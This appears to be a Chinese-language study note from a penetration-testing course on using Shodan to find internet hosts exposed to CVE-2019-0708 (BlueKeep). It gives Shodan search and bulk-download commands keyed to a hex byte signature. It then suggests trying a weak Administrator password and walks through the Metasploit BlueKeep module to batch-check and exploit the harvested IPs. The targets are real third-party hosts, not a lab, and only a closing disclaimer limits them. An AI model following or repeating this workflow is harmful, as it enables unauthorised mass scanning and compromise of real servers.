星河飞雪网络安全学习笔记-shodan2
学习笔记-shodan2
Shodan查漏洞
Shodan的指令语法是特别多的,有些参数可能都用不上,主要使用一些红队最常用的参数,看看怎么去查找cve-2019-0708的漏洞。
cve-2019-0708
概要
cve-2019-0708漏洞是通过检查用户的身份认证,不要任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。
原理
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道MS_T120的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束后还会调用MS_T120结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的MS_T120,并为结构体内的函数指针赋予恰当的值,即可实现远程命令执行。
使用shodan搜索漏洞ip
我们可以使用漏洞的漏洞特征来寻找漏洞,比如:shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' 后面这字符串就是cve-2019-0708的十六进制漏洞特征,我们可以在shodan中找到有该漏洞的ip,但是有漏洞不代表能利用。
漏洞复现方式
在搜索到有cve-2019-0708的漏洞ip后,我们可以使用远程命令连接工具来连接到ip。
先测试下弱口令 Adminstrator,不行的话也没事,我们还可以使用metasploit进行批量的漏洞利用。创建一个文件,将在shodan中搜索的ip给放入文件中。
在命令行输入msfconsole
首先先搜索相关的利用漏洞,输入search cve-2019-0708,发现可以利用的漏洞exp。
利用exp,输入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce(复制),进入到利用脚本。
输入show options。
将上述创建的目标ip地址文件拖入。
输入check,检测10个ip中可利用的ip,发现上述ip都未成功利用。
Shodan批量刷漏洞
shodan download xx --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
shodan parse --fields ip_str 拖入文件,发现下载成功并解析。
我们可以将其导入到txt文件中,输入shodan parse --fields ip_str >xx.txt。
声明
学习课程视频来自B站up主泷羽sec全栈渗透测试教学(免费),如涉及侵权马上删除文章
视频链接为泷羽sec的个人空间-泷羽sec个人主页-哔哩哔哩视频
笔记只是方便师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。